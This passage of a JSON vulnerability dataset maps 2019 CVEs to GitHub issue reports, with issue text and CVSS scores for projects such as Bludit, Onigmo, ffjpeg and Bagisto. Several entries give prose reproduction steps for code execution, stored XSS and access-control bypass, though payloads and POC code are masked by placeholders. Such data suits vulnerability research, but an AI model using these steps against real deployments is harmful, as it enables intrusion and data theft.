        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-16096",
        "Issue_Url_old": "https://github.com/antirez/kilo/issues/60",
        "Issue_Url_new": "https://github.com/antirez/kilo/issues/60",
        "Repo_new": "antirez/kilo",
        "Issue_Created_At": "2019-08-27T02:04:47Z",
        "description": "Integer Overflow && heap buffer overflow in kilo.c. There is a heap overflow caused by integer overflow in kilo.c. POC: APITAG In command line: APITAG Output: ERRORTAG Analyze: There is an integer overflow in function APITAG CODETAG The space size being malloc will be calculated based on the number of TABs in one row. When the number of TAB is too big,it will lead to Integer Overflow. And it will lead to heap buffer overflow finally.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-16109",
        "Issue_Url_old": "https://github.com/plataformatec/devise/issues/5071",
        "Issue_Url_new": "https://github.com/heartcombo/devise/issues/5071",
        "Repo_new": "heartcombo/devise",
        "Issue_Created_At": "2019-05-04T00:12:11Z",
        "description": "Confirmable should generate a token if confirmation_token is currently an empty string. Environment Ruby NUMBERTAG p NUMBERTAG Rails NUMBERTAG Devise NUMBERTAG Current behavior Currently, when using the confirmable module, devise only checks if the APITAG field not nil. If it's nil, it will generate a confirmation token for you; if it's not, it won't. However, it can be set to an empty string, which should not be allowed, as it presents a security issue, allowing someone passing an empty string as the confirmation token to sign in as the person with the blank string confirmation token. This is the offending code: URLTAG Expected behavior Devise should do something like APITAG , which checks for nil and blank.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-16113",
        "Issue_Url_old": "https://github.com/bludit/bludit/issues/1081",
        "Issue_Url_new": "https://github.com/bludit/bludit/issues/1081",
        "Repo_new": "bludit/bludit",
        "Issue_Created_At": "2019-09-07T11:40:38Z",
        "description": "Bludit NUMBERTAG Code Execution Vulnerability in APITAG function\" . A Code Execution Vulnerability in Bludit NUMBERTAG Hi, For CVE ID,so I open a new issue,sorry about APITAG I think you haven't completely fixed the bug. There is a new Code Execution Vulnerability which allow to get server permissions,the path is PATHTAG NUMBERTAG login with any account which allows you to edit conten FILETAG NUMBERTAG upload the evil jpg We can specify the location of the uploaded file by changing the value of the uuid,then upload the evil picture to tmp folder FILETAG FILETAG NUMBERTAG upload both APITAG file and the access target jpg FILETAG FILETAG FILETAG Successfully reverted to the target file NUMBERTAG Access the evil file that are written through jpg FILETAG So I recommend checking the file before uploading it to temporary directory",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-16126",
        "Issue_Url_old": "https://github.com/getgrav/grav/issues/2657",
        "Issue_Url_new": "https://github.com/getgrav/grav/issues/2657",
        "Repo_new": "getgrav/grav",
        "Issue_Created_At": "2019-08-31T12:29:53Z",
        "description": "XSS: Stored XSS due to Javascript execution in SVG files. Hello, I found that when uploading a new avatar, you can upload a SVG file, which can contain Javascript (which gets executed upon visit). I've attached a SVG file which can be used to reproduce the issue. If more information is needed, I can provide that. Kind regards, MENTIONTAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-16130",
        "Issue_Url_old": "https://github.com/weison-tech/yii2-cms/issues/2",
        "Issue_Url_new": "https://github.com/weison-tech/yii2-cms/issues/2",
        "Repo_new": "weison-tech/yii2-cms",
        "Issue_Created_At": "2019-08-31T14:28:50Z",
        "description": "yii2 cms\u5b58\u5728\u5b58\u50a8\u578bXSS. \u5728\u524d\u7aef\u7684\u7559\u8a00\u5904\u672a\u8fc7\u6ee4\u8f93\u5165\u5185\u5bb9 \u6709\u6548\u8d1f\u8377\uff1a APITAG \u6587\u4ef6\u540d PATHTAG \u4ee3\u7801 ERRORTAG \u5229\u7528 \u6211\u4eec\u53d1\u73b0name\u6ca1\u6709\u9650\u5236\u8f93\u5165\u7684\u957f\u5ea6\uff0c\u5c1d\u8bd5\u6784\u9020\u6709\u6548\u8d1f\u8377 POC CODETAG \u7ed3\u679c \u6211\u4eec\u53bb\u540e\u53f0\u67e5\u770b FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-16139",
        "Issue_Url_old": "https://github.com/llogiq/compact_arena/issues/22",
        "Issue_Url_new": "https://github.com/llogiq/compact_arena/issues/22",
        "Repo_new": "llogiq/compact_arena",
        "Issue_Created_At": "2019-05-21T18:44:48Z",
        "description": "Generativity mechanism is unsound \ud83d\udca5. (sorry; I only found this because I was trying to imitate your closure less generativity) CODETAG This successfully compiles and panics with ERRORTAG and segfaults when compiled in release mode with ERRORTAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-16141",
        "Issue_Url_old": "https://github.com/matklad/once_cell/issues/46",
        "Issue_Url_new": "https://github.com/matklad/once_cell/issues/46",
        "Repo_new": "matklad/once_cell",
        "Issue_Created_At": "2019-09-01T16:23:01Z",
        "description": "Lazy can cause UB when initialization fails, and program retries initialization. The following program causes UB: ERRORTAG This is because of incorrect use of ERRORTAG when Lazy structure is poisoned. ERRORTAG This should panic instead of causing unchecked UB.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-16144",
        "Issue_Url_old": "https://github.com/Xudong-Huang/generator-rs/issues/9",
        "Issue_Url_new": "https://github.com/xudong-huang/generator-rs/issues/9",
        "Repo_new": "xudong-huang/generator-rs",
        "Issue_Created_At": "2019-01-11T21:34:45Z",
        "description": "APITAG is unsound. APITAG takes NUMBERTAG APITAG parameters, but the rest of the Scope API assumes that those raw pointers are valid. For example, the public APITAG method does the following: ERRORTAG Calling APITAG with invalid (null, misaligned or dangling) pointers is possible in safe Rust, and APITAG can also be called from safe Rust, therefore this API is unsound. Either APITAG should be marked ERRORTAG , or it should take APITAG instead of raw pointers, adding a lifetime parameter to Scope .",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-16161",
        "Issue_Url_old": "https://github.com/k-takata/Onigmo/issues/132",
        "Issue_Url_new": "https://github.com/k-takata/onigmo/issues/132",
        "Repo_new": "k-takata/onigmo",
        "Issue_Created_At": "2019-07-27T23:59:01Z",
        "description": "Memory corruption in APITAG When onig_new(ONIG_SYNTAX_PERL) failes with error code APITAG APITAG crashes due to invalid memory access. Here is a POC code based on sample/syntax.c ERRORTAG CODETAG I've confirmed that, after onig_new(ONIG_SYNTAX_PERL ....) failure in APITAG einfo.enc points to invalid address. Then APITAG force to use some member of invalid APITAG causes memory corruption. Here is a crash log. ONIGENC_MBC_TO_CODE(enc, p, end) in APITAG try to call NULL address (einfo.enc >mbc_to_code). ERRORTAG Thanks Ren",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-16162",
        "Issue_Url_old": "https://github.com/k-takata/Onigmo/issues/139",
        "Issue_Url_new": "https://github.com/k-takata/onigmo/issues/139",
        "Repo_new": "k-takata/onigmo",
        "Issue_Created_At": "2019-07-31T00:45:06Z",
        "description": "Out of bounds read in APITAG When Onigmo try to parse a regular expression NUMBERTAG it causes out of bounds read in APITAG Here is a POC code based on sample/syntax.c ERRORTAG APITAG Here is a crash log. CODETAG Thanks",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-16163",
        "Issue_Url_old": "https://github.com/kkos/oniguruma/issues/147",
        "Issue_Url_new": "https://github.com/kkos/oniguruma/issues/147",
        "Repo_new": "kkos/oniguruma",
        "Issue_Created_At": "2019-07-29T02:45:52Z",
        "description": "Stack Exhaustion Problem caused by some parsing function in regcomp.c making recursive calls to itself. If Oniguruma try to optimize very deep regex nodes, it causes stack buffer overflow due to deep recursive calls to some parsing functions like APITAG APITAG Here is a POC source code that simply executes APITAG with very large regular expression APITAG .... \". ERRORTAG APITAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-16164",
        "Issue_Url_old": "https://github.com/lexborisov/myhtml/issues/175",
        "Issue_Url_new": "https://github.com/lexborisov/myhtml/issues/175",
        "Repo_new": "lexborisov/myhtml",
        "Issue_Created_At": "2019-07-29T07:41:57Z",
        "description": "NULL ptr dereference in tree node remove callback. POC HTML code is here URLTAG APITAG While parsing above HTML code, myhtml try to remove \\ APITAG tag because \\ APITAG tag is not closed correctly. \" APITAG tag NUMBERTAG b NUMBERTAG a NUMBERTAG e8) and causes NULL ptr dereference at myhtml_node_tag_id( myhtml_node_parent(node) ); in APITAG CODETAG Here is a crash log. ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-16167",
        "Issue_Url_old": "https://github.com/sysstat/sysstat/issues/230",
        "Issue_Url_new": "https://github.com/sysstat/sysstat/issues/230",
        "Repo_new": "sysstat/sysstat",
        "Issue_Created_At": "2019-08-03T01:42:44Z",
        "description": "Memory corruption bug due to Integer Overflow in APITAG If sadf utility reads following stat file, it causes memory corruption (SIGSEGV). FILETAG APITAG A crash happens in following part in FILETAG . ERRORTAG If stat file has large file_magic >hdr_types_nr(ftypes_nr NUMBERTAG the calculation at ftypes_nr NUMBERTAG ULL_ALIGNMENT_WIDTH leads Integer Overflow and pass above size check, then causes OOB access at memset(((char ) ps) + ftypes_nr NUMBERTAG ULL_ALIGNMENT_WIDTH...) Here is a crash log. ERRORTAG Thanks",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-16249",
        "Issue_Url_old": "https://github.com/opencv/opencv/issues/15481",
        "Issue_Url_new": "https://github.com/opencv/opencv/issues/15481",
        "Repo_new": "opencv/opencv",
        "Issue_Created_At": "2019-09-07T15:52:32Z",
        "description": "APITAG Build type: Release APITAG version: APITAG OS: APITAG APITAG VCS version: APITAG I've complied opencv with clang enabling ASAN while fuzzing the opencv_test_video binary APITAG and APITAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-16276",
        "Issue_Url_old": "https://github.com/golang/go/issues/34540",
        "Issue_Url_new": "https://github.com/golang/go/issues/34540",
        "Repo_new": "golang/go",
        "Issue_Created_At": "2019-09-25T21:40:44Z",
        "description": "net/http: invalid headers are normalized, allowing request smuggling. net/http (through net/textproto) used to accept and normalize invalid HTTP NUMBERTAG headers with a space before the colon, in violation of RFC NUMBERTAG If a Go server is used behind a reverse proxy that accepts and forwards but doesn't normalize such invalid headers, the reverse proxy and the server can interpret the headers differently. This can lead to filter bypasses or request smuggling, the latter if requests from separate clients are multiplexed onto the same connection by the proxy. Such invalid headers are now rejected by Go servers, and passed without normalization to Go client applications. This issue is CVETAG and is fixed in Go NUMBERTAG and Go NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-16303",
        "Issue_Url_old": "https://github.com/jhipster/jhipster-kotlin/issues/183",
        "Issue_Url_new": "https://github.com/jhipster/jhipster-kotlin/issues/183",
        "Repo_new": "jhipster/jhipster-kotlin",
        "Issue_Created_At": "2019-09-13T22:27:51Z",
        "description": "FILETAG APITAG is using an insecure source of randomness to generate all of it's random values. APITAG relies upon apache commons lang3 APITAG . From the documentation: > Caveat: Instances of Random, upon which the implementation of this class relies, are not cryptographically secure. > \\ FILETAG Here are the examples of APITAG Kotlin's use of an insecure PRNG: URLTAG Proof Of Concepts Already Exist There has been a POC of taking one RNG value generated APITAG and reversing it to generate all of the past/future RNG values public since March NUMBERTAG rd NUMBERTAG URLTAG POC Repository: URLTAG Potential Impact Technical All that is required is to get one password reset token from a APITAG generated service and using the POC above, you can reverse what all future password reset tokens to be generated by this server. This allows an attacker to pick and choose what account they would like to takeover by sending account password reset requests for targeted accounts.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-16303",
        "Issue_Url_old": "https://github.com/jhipster/generator-jhipster/issues/10401",
        "Issue_Url_new": "https://github.com/jhipster/generator-jhipster/issues/10401",
        "Repo_new": "jhipster/generator-jhipster",
        "Issue_Created_At": "2019-09-13T07:57:12Z",
        "description": "Bug bounty for security advisory. This is for URLTAG which isn't public at the time of this writing MENTIONTAG thank you so much for reporting this issue!!! We would like to thank you by giving you a NUMBERTAG bug bounty on the project, and this is why I'm creating this ticket (this is to follow our official process to give money). To have more information on our bug bounties program, please read URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-16333",
        "Issue_Url_old": "https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1313",
        "Issue_Url_new": "https://github.com/getsimplecms/getsimplecms/issues/1313",
        "Repo_new": "getsimplecms/getsimplecms",
        "Issue_Created_At": "2019-08-28T13:02:41Z",
        "description": "XSS in FILETAG . Version impacted NUMBERTAG Payload: APITAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2019-16334",
        "Issue_Url_old": "https://github.com/bludit/bludit/issues/1078",
        "Issue_Url_new": "https://github.com/bludit/bludit/issues/1078",
        "Repo_new": "bludit/bludit",
        "Issue_Created_At": "2019-08-29T06:40:10Z",
        "description": "Stored XSS in bludit NUMBERTAG ulnerability Bludit NUMBERTAG is vulnerable to a stored XSS vulnerability in Categories > Add New Category > Name Parameter Steps to reproduce the problem Go to Categories > Add New Category and insert the following payload in FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2019-16346",
        "Issue_Url_old": "https://github.com/miniupnp/ngiflib/issues/11",
        "Issue_Url_new": "https://github.com/miniupnp/ngiflib/issues/11",
        "Repo_new": "miniupnp/ngiflib",
        "Issue_Created_At": "2019-04-13T13:37:39Z",
        "description": "heap buffer overflow at APITAG in APITAG Tested in Ubuntu NUMBERTAG bit, ngiflib(master NUMBERTAG bb NUMBERTAG Triggered by APITAG POC file: URLTAG ASAN info: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-16347",
        "Issue_Url_old": "https://github.com/miniupnp/ngiflib/issues/12",
        "Issue_Url_new": "https://github.com/miniupnp/ngiflib/issues/12",
        "Repo_new": "miniupnp/ngiflib",
        "Issue_Created_At": "2019-04-13T13:39:52Z",
        "description": "heap buffer overflow at APITAG in APITAG Test in Ubuntu NUMBERTAG bit, ngiflib(master NUMBERTAG bb NUMBERTAG Triggered by APITAG POC file: URLTAG ASAN info: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-16348",
        "Issue_Url_old": "https://github.com/marc-q/libwav/issues/24",
        "Issue_Url_new": "https://github.com/marc-q/libwav/issues/24",
        "Repo_new": "marc-q/libwav",
        "Issue_Created_At": "2019-08-15T08:01:41Z",
        "description": "NULL Pointer Dereference in gain_file at APITAG Tested in Ubuntu NUMBERTAG bit, libwav (master NUMBERTAG cc NUMBERTAG Triggered by APITAG POC file: URLTAG ASAN info: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-16349",
        "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/422",
        "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/422",
        "Repo_new": "axiomatic-systems/bento4",
        "Issue_Created_At": "2019-08-18T06:57:23Z",
        "description": "NULL Pointer Dereference in APITAG at APITAG Tested in Ubuntu NUMBERTAG bit, Bento4(master cbebcc9) Triggered by cmd: APITAG POC file: URLTAG ASAN info: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-16350",
        "Issue_Url_old": "https://github.com/rockcarry/ffjpeg/issues/10",
        "Issue_Url_new": "https://github.com/rockcarry/ffjpeg/issues/10",
        "Repo_new": "rockcarry/ffjpeg",
        "Issue_Created_At": "2019-08-18T08:03:41Z",
        "description": "NULL Pointer Dereference in APITAG at APITAG Test Environment Ubuntu NUMBERTAG bit, ffjpeg(master cbebcc9) How to trigger NUMBERTAG compile ffjpeg with cmake file from URLTAG NUMBERTAG APITAG POC file URLTAG Details Asan report ERRORTAG GDB report CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-16351",
        "Issue_Url_old": "https://github.com/rockcarry/ffjpeg/issues/11",
        "Issue_Url_new": "https://github.com/rockcarry/ffjpeg/issues/11",
        "Repo_new": "rockcarry/ffjpeg",
        "Issue_Created_At": "2019-08-18T08:04:59Z",
        "description": "SEGV in APITAG at APITAG Test Environment Ubuntu NUMBERTAG bit, ffjpeg(master cbebcc9) How to trigger NUMBERTAG compile ffjpeg with cmake file from URLTAG NUMBERTAG APITAG POC file URLTAG Details Asan report ERRORTAG GDB report CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-16352",
        "Issue_Url_old": "https://github.com/rockcarry/ffjpeg/issues/12",
        "Issue_Url_new": "https://github.com/rockcarry/ffjpeg/issues/12",
        "Repo_new": "rockcarry/ffjpeg",
        "Issue_Created_At": "2019-08-18T08:07:01Z",
        "description": "APITAG heap buffer overflow in APITAG at APITAG Test Environment Ubuntu NUMBERTAG bit, ffjpeg(master cbebcc9) How to trigger NUMBERTAG compile ffjpeg with cmake file from URLTAG NUMBERTAG APITAG POC file URLTAG Details Asan report ERRORTAG GDB report ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-16354",
        "Issue_Url_old": "https://github.com/astaxie/beego/issues/3763",
        "Issue_Url_new": "https://github.com/astaxie/beego/issues/3763",
        "Repo_new": "astaxie/beego",
        "Issue_Created_At": "2019-08-14T17:35:56Z",
        "description": "File Session Managment permission problem. Please answer these questions before submitting your issue. Thanks! Dear beego Team, I would like to report a security vulnerability in Beego's session. There is a problem with file permission when on the File Session Manager that allows (OS) regular access system to access the session folder and potential read session files. The problem can be found on sess_file.go on the APITAG function, where a folder is created based on the provided sid with a NUMBERTAG permission mask, allowing every use on the system to access the folder, create and remove files. func (fp APITAG APITAG string) APITAG error) { func (fp APITAG APITAG string) APITAG error) { APITAG defer APITAG err := APITAG string(sid NUMBERTAG string(sid NUMBERTAG It later tries to do a stat to see if the session file is there and open or created the session file based on that. A race condition could be generated where a user will try to create it as soon as the folder was created, owning the file and being able to modify later. If that is not achieved, there is still a problem with the file creation. f, err = APITAG string(sid NUMBERTAG string(sid NUMBERTAG sid)) according to documentation APITAG creates the named file with mode NUMBERTAG before umask), truncating it if it already exists\", which could also potentially allow a regular user to read the content of the file (again, from inside the Operating System). Keep in mind, that similar behavior occurs on the APITAG function that should be addressed. However, it's important to notice as the documentation describes that APITAG will apply umask to the permission mode. In ubuntu, for example, that will end up in NUMBERTAG permission (unless someone changes it), still that makes the file readable and allow users in the OS to read the file's content. Please let me know when you have fixed the vulnerability so that I can coordinate my disclosure with yours. For reference, here is a link to Semmle's vulnerability disclosure policy: URLTAG Thank you,",
        "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.7,
        "impactScore": 3.6,
        "exploitabilityScore": 1.0
    },
    {
        "CVE_ID": "CVE-2019-16366",
        "Issue_Url_old": "https://github.com/Moddable-OpenSource/moddable/issues/235",
        "Issue_Url_new": "https://github.com/moddable-opensource/moddable/issues/235",
        "Repo_new": "moddable-opensource/moddable",
        "Issue_Created_At": "2019-07-25T07:08:13Z",
        "description": "XS: Heap Buffer Overflow . Hello, We find a heap buffer overflow vulnerability in XS NUMBERTAG which is reported by Address Sanitizer. We compile and run the xs in linu NUMBERTAG The simplified js code: ERRORTAG Output of executing './xst s crash.js' ERRORTAG According to the report, APITAG access memory which should not be allowed. You can get the report too, if you compile XS with fsanitize option, then just run the xst with the js. Modify PATHTAG add \" fsanitize=address\" into C_OPTIONS (line NUMBERTAG and LINK_OPTIONS (line NUMBERTAG then make it, you will get the xst in /lin/debug which has been instrumented with APITAG Built in Security Lab APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-16377",
        "Issue_Url_old": "https://github.com/makandra/consul/issues/49",
        "Issue_Url_new": "https://github.com/makandra/consul/issues/49",
        "Repo_new": "makandra/consul",
        "Issue_Created_At": "2019-09-23T09:40:52Z",
        "description": "Security vulnerability: Multiple powers in one controller are not always checked correctly. We have identified a security issue in consul. When a controller has multiple power directives, the :only and :except options of the last directive is applied to all directives. This can lead to unauthenticated access to certain controller actions. Affected versions NUMBERTAG Fixed versions NUMBERTAG Affected code looks like this: APITAG In this example both the powers :foo and :bar are only checked for the index action. Other actions were left unprotected by powers checks. Controllers with a single power directive are unaffected. Controllers where neither power uses :only or :except options are unaffected. This vulnerability has been assigned the CVE identifier CVETAG .",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-16403",
        "Issue_Url_old": "https://github.com/bagisto/bagisto/issues/749",
        "Issue_Url_new": "https://github.com/bagisto/bagisto/issues/749",
        "Repo_new": "bagisto/bagisto",
        "Issue_Created_At": "2019-03-27T12:52:24Z",
        "description": "broken access control. Threat: sensitive data disclosure Risk level: HIGH Complexity: medium Vulnerable functions: Bagisto front end The list of functionality mentioned below are designed for customers to change their own values such as address, review etc can also be manipulated by other customers NUMBERTAG Address field: PATHTAG item_value NUMBERTAG Review: PATHTAG item_value NUMBERTAG Orders: PATHTAG item_value ] Tool Used: Burp proxy (to manipulate requests) Steps to reproduce the attack NUMBERTAG Address field: step NUMBERTAG create two users user NUMBERTAG EMAILTAG user NUMBERTAG EMAILTAG (default user on demo) step NUMBERTAG Add multiple address to both the users and check their id. step NUMBERTAG Edit the address using another users address id which will show you the address of that user. User1 can PATHTAG address of User2 and vice versa. Similarly, same technique can be used to exploit other functions NUMBERTAG Product review: Review id can be changed to another user's review id to delete review made by another user NUMBERTAG Orders : Order id can be changed to view orders made by another user. Impacts of vulnerability: Sensitive data disclosure where an user can easily view another user's data. Reference: URLTAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-16510",
        "Issue_Url_old": "https://github.com/mz-automation/libiec61850/issues/164",
        "Issue_Url_new": "https://github.com/mz-automation/libiec61850/issues/164",
        "Repo_new": "mz-automation/libiec61850",
        "Issue_Created_At": "2019-09-09T18:14:27Z",
        "description": "Heap use after free in server_example_goose. Hello we found Heap user after free vulnerability in server_example_goose binary. Below are steps followed to reproduce crash Download latest source code from : FILETAG and compiled using ASAN (cmake .. DCMAKE_CXX_FLAGS=\" fsanitize=address fsanitize=leak g ggdb fno omit frame pointer static libstdc++ static libasan\" DCMAKE_C_FLAGS=\" fsanitize=address fsanitize=leak g ggdb fno omit frame pointer static libstdc++ static libasan\") GDB Output ERRORTAG ASAN Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-16520",
        "Issue_Url_old": "https://github.com/semperfiwebdesign/all-in-one-seo-pack/issues/2888",
        "Issue_Url_new": "https://github.com/awesomemotive/all-in-one-seo-pack/issues/2888",
        "Repo_new": "awesomemotive/all-in-one-seo-pack",
        "Issue_Created_At": "2019-09-10T13:25:27Z",
        "description": "Escape meta description output.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2019-16532",
        "Issue_Url_old": "https://github.com/yzmcms/yzmcms/issues/28",
        "Issue_Url_new": "https://github.com/yzmcms/yzmcms/issues/28",
        "Repo_new": "yzmcms/yzmcms",
        "Issue_Created_At": "2019-09-22T05:40:02Z",
